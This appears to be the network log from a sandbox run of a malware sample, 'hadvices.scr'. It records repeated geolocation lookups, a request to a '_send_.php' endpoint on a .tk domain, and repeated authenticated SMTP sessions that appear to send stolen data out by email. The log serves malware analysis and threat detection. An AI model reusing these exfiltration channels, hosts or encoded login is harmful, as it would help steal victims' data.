                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=889RWY73f29sE5zUYkQ%2FvuO59MG0MHtZePHpiLN%2BWPnqi4xZdcw%2Bk4nN%2FBgYBAj8pqi93InaDtUudtwemCdi3Lfc4ikbcSJz%2B9ltRw0dUarHaI7e%2FxsvazP3VfnP4qm%2FgecYh5O%2B"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d4b89c93b68-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:17:28 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
                                                    2024-05-01 13:17:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.749729172.67.177.1344438336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-01 13:17:30 UTC85OUTGET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-05-01 13:17:30 UTC691INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:30 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: MISS
                                                    Last-Modified: Wed, 01 May 2024 13:17:30 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HSbU01gPN9fVMPzMGcmMSglZBvNgbww9J31iBoY1i9EjoRnPQ7sA9PTjrL80Ac8hzZ3pZQAH6qBVlSQzOmxCikOt83EBNrSnVpUlcXBDm7zzqa0oX7jU%2BnAn1BOcSGeSVHBszOEU"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d595ac35848-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:17:30 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
                                                    2024-05-01 13:17:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.749731172.67.177.1344438336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-01 13:17:31 UTC61OUTGET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-05-01 13:17:31 UTC700INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:31 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 4
                                                    Last-Modified: Wed, 01 May 2024 13:17:27 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bw9%2BwJZ8NI5qcNLvkFbkyTo3teP26L708nsWJyr%2BTBlkGEHsImkhdaXS1k7zh5kMbKXdsYtEhp6CnF3NygpPnnCZ7LT1GDKRtl7hiNK94You6SWju2fugxFiFQFLKuGepYnSiRzx"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d5f7a353932-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:17:31 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
                                                    2024-05-01 13:17:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.749733172.67.177.1344438336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-01 13:17:31 UTC61OUTGET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-05-01 13:17:32 UTC708INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:32 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 4
                                                    Last-Modified: Wed, 01 May 2024 13:17:28 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FPfowrYSP8EhiG0OB07MkL3J8fDbcgH5T%2BEZx7nrCUpMJBQDn9XS0eVY%2Bzc6ubhYGB31knI5qJVj1vKPb60LEYodvyns%2FxQMTQYf5U%2BQZ7TM8Cp4VsvZ%2Bdny4WN93Qnn%2FZo0mO8P"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d637dc4054a-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:17:32 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
                                                    2024-05-01 13:17:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.749735172.67.177.1344438336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-01 13:17:32 UTC85OUTGET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-05-01 13:17:33 UTC698INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:33 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 0
                                                    Last-Modified: Wed, 01 May 2024 13:17:33 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S6UNSa0du88oS3FOQw1bNspGbKXUKpjtHJlSB0U2Br4RHZKy9TLSmDkOVHbKKncamOXoHitM3AV1saKTLoGBvkl7Ya3lynyLbJEwKpqZJ96z5t7yqnA5ngkjFRxRaWfwaIK9%2Bm23"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d679df428a4-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:17:33 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
                                                    2024-05-01 13:17:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.749737172.67.177.1344438336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-01 13:17:34 UTC85OUTGET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-05-01 13:17:34 UTC710INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:34 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 7
                                                    Last-Modified: Wed, 01 May 2024 13:17:27 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8FJHdLfoHwRXKi7%2F9BYIpJJvbMUutRU%2BqQrfEcrBsCqqp%2FQ%2F18uODgyZTGaI1GzmqkDC3%2B5j9sYgJxKCnQzuDysGopFHyO6wc1j7hEnNuIw2LOrsTrEX%2B%2BE5V8lqF9HNjXf2ar20"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d728d5a5a8d-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:17:34 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
                                                    2024-05-01 13:17:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.749739172.67.177.1344438336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-01 13:17:34 UTC85OUTGET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-05-01 13:17:35 UTC693INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:35 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: MISS
                                                    Last-Modified: Wed, 01 May 2024 13:17:35 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eth4Glb1qHOXFUx7rcJRXgtiRcLmcDjjcV%2FQT%2Bw2Pwy9Uwkaz3qphIA6yEIO3AUAl5iueyi9XWymjlMSESW3HFCWVU8cHImOZ4BM2od1Xug46F2b2GKcVYVpQtgM2mVIUJZXXEn9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d76ac34827b-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:17:35 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
                                                    2024-05-01 13:17:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.749740172.67.169.184438336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-01 13:17:36 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                    Host: scratchdreams.tk
                                                    Connection: Keep-Alive
                                                    2024-05-01 13:18:15 UTC735INHTTP/1.1 522
                                                    Date: Wed, 01 May 2024 13:18:15 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 15
                                                    Connection: close
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VWcfuWbC8wEyKzm4iTvfa3ldmabudxUgvvHNDA99d7YDJp%2FsfoEdkVWNREmYn%2B9WuucXJNR%2FbkyvTHJw9PA2O5GNHZW2c82AyQdmcvUsUlFT3RaJqZAIr087q0sS5Zu7481k"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    X-Frame-Options: SAMEORIGIN
                                                    Referrer-Policy: same-origin
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d7e1e969c66-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:18:15 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                    Data Ascii: error code: 522


                                                    SMTP Packets

                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                    May 1, 2024 15:18:22.234245062 CEST58749743108.167.142.65192.168.2.7220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:22 -0500
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    May 1, 2024 15:18:22.237030983 CEST49743587192.168.2.7108.167.142.65EHLO 124406
                                                    May 1, 2024 15:18:22.422550917 CEST58749743108.167.142.65192.168.2.7250-gator4175.hostgator.com Hello 124406 [149.18.24.96]
                                                    250-SIZE 52428800
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-PIPECONNECT
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    May 1, 2024 15:18:22.423414946 CEST49743587192.168.2.7108.167.142.65AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
                                                    May 1, 2024 15:18:22.608987093 CEST58749743108.167.142.65192.168.2.7334 UGFzc3dvcmQ6
                                                    May 1, 2024 15:18:22.815016031 CEST58749743108.167.142.65192.168.2.7235 Authentication succeeded
                                                    May 1, 2024 15:18:22.816876888 CEST49743587192.168.2.7108.167.142.65MAIL FROM:<test@qoldenfrontier.com>
                                                    May 1, 2024 15:18:23.002016068 CEST58749743108.167.142.65192.168.2.7250 OK
                                                    May 1, 2024 15:18:23.005209923 CEST49743587192.168.2.7108.167.142.65RCPT TO:<receive@qoldenfrontier.com>
                                                    May 1, 2024 15:18:23.209431887 CEST58749743108.167.142.65192.168.2.7250 Accepted
                                                    May 1, 2024 15:18:23.212903023 CEST49743587192.168.2.7108.167.142.65DATA
                                                    May 1, 2024 15:18:23.398072958 CEST58749743108.167.142.65192.168.2.7354 Enter message, ending with "." on a line by itself
                                                    May 1, 2024 15:18:23.398718119 CEST49743587192.168.2.7108.167.142.65.
                                                    May 1, 2024 15:18:23.584955931 CEST58749743108.167.142.65192.168.2.7250 OK id=1s29qp-002MZW-0y
                                                    May 1, 2024 15:18:32.787504911 CEST49743587192.168.2.7108.167.142.65QUIT
                                                    May 1, 2024 15:18:33.174777985 CEST58749743108.167.142.65192.168.2.7221 gator4175.hostgator.com closing connection
                                                    May 1, 2024 15:18:33.596746922 CEST58749744108.167.142.65192.168.2.7220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:33 -0500
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    May 1, 2024 15:18:33.597153902 CEST49744587192.168.2.7108.167.142.65EHLO 124406
                                                    May 1, 2024 15:18:33.782171965 CEST58749744108.167.142.65192.168.2.7250-gator4175.hostgator.com Hello 124406 [149.18.24.96]
                                                    250-SIZE 52428800
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-PIPECONNECT
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    May 1, 2024 15:18:33.783207893 CEST49744587192.168.2.7108.167.142.65AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
                                                    May 1, 2024 15:18:33.969841003 CEST58749744108.167.142.65192.168.2.7334 UGFzc3dvcmQ6
                                                    May 1, 2024 15:18:34.156584024 CEST58749744108.167.142.65192.168.2.7235 Authentication succeeded
                                                    May 1, 2024 15:18:34.156830072 CEST49744587192.168.2.7108.167.142.65MAIL FROM:<test@qoldenfrontier.com>
                                                    May 1, 2024 15:18:34.341757059 CEST58749744108.167.142.65192.168.2.7250 OK
                                                    May 1, 2024 15:18:34.341912985 CEST49744587192.168.2.7108.167.142.65RCPT TO:<receive@qoldenfrontier.com>
                                                    May 1, 2024 15:18:34.536429882 CEST58749744108.167.142.65192.168.2.7250 Accepted
                                                    May 1, 2024 15:18:34.536693096 CEST49744587192.168.2.7108.167.142.65DATA
                                                    May 1, 2024 15:18:34.721483946 CEST58749744108.167.142.65192.168.2.7354 Enter message, ending with "." on a line by itself
                                                    May 1, 2024 15:18:34.721896887 CEST49744587192.168.2.7108.167.142.65.
                                                    May 1, 2024 15:18:34.910490036 CEST58749744108.167.142.65192.168.2.7250 OK id=1s29r0-002Mkk-21
                                                    May 1, 2024 15:18:34.910955906 CEST49744587192.168.2.7108.167.142.65QUIT
                                                    May 1, 2024 15:18:35.297065973 CEST58749744108.167.142.65192.168.2.7221 gator4175.hostgator.com closing connection
                                                    May 1, 2024 15:18:35.734958887 CEST58749745108.167.142.65192.168.2.7220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:35 -0500
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    May 1, 2024 15:18:35.735127926 CEST49745587192.168.2.7108.167.142.65EHLO 124406
                                                    May 1, 2024 15:18:35.919647932 CEST58749745108.167.142.65192.168.2.7250-gator4175.hostgator.com Hello 124406 [149.18.24.96]
                                                    250-SIZE 52428800
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-PIPECONNECT
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    May 1, 2024 15:18:35.919945002 CEST49745587192.168.2.7108.167.142.65AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
                                                    May 1, 2024 15:18:36.104454041 CEST58749745108.167.142.65192.168.2.7334 UGFzc3dvcmQ6
                                                    May 1, 2024 15:18:36.294116974 CEST58749745108.167.142.65192.168.2.7235 Authentication succeeded
                                                    May 1, 2024 15:18:36.294261932 CEST49745587192.168.2.7108.167.142.65MAIL FROM:<test@qoldenfrontier.com>
                                                    May 1, 2024 15:18:36.480974913 CEST58749745108.167.142.65192.168.2.7250 OK
                                                    May 1, 2024 15:18:36.483011007 CEST49745587192.168.2.7108.167.142.65RCPT TO:<receive@qoldenfrontier.com>
                                                    May 1, 2024 15:18:36.679652929 CEST58749745108.167.142.65192.168.2.7250 Accepted
                                                    May 1, 2024 15:18:36.679847956 CEST49745587192.168.2.7108.167.142.65DATA
                                                    May 1, 2024 15:18:36.864588976 CEST58749745108.167.142.65192.168.2.7354 Enter message, ending with "." on a line by itself
                                                    May 1, 2024 15:18:36.865027905 CEST49745587192.168.2.7108.167.142.65.
                                                    May 1, 2024 15:18:37.050724030 CEST58749745108.167.142.65192.168.2.7250 OK id=1s29r2-002MmM-2U
                                                    May 1, 2024 15:18:37.051245928 CEST49745587192.168.2.7108.167.142.65QUIT
                                                    May 1, 2024 15:18:37.438815117 CEST58749745108.167.142.65192.168.2.7221 gator4175.hostgator.com closing connection
                                                    May 1, 2024 15:18:37.881153107 CEST58749746108.167.142.65192.168.2.7220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:37 -0500
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    May 1, 2024 15:18:37.881314039 CEST49746587192.168.2.7108.167.142.65EHLO 124406
                                                    May 1, 2024 15:18:38.066452026 CEST58749746108.167.142.65192.168.2.7250-gator4175.hostgator.com Hello 124406 [149.18.24.96]
                                                    250-SIZE 52428800
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-PIPECONNECT
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    May 1, 2024 15:18:38.066719055 CEST49746587192.168.2.7108.167.142.65AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
                                                    May 1, 2024 15:18:38.257388115 CEST58749746108.167.142.65192.168.2.7334 UGFzc3dvcmQ6
                                                    May 1, 2024 15:18:38.443741083 CEST58749746108.167.142.65192.168.2.7235 Authentication succeeded
                                                    May 1, 2024 15:18:38.443901062 CEST49746587192.168.2.7108.167.142.65MAIL FROM:<test@qoldenfrontier.com>
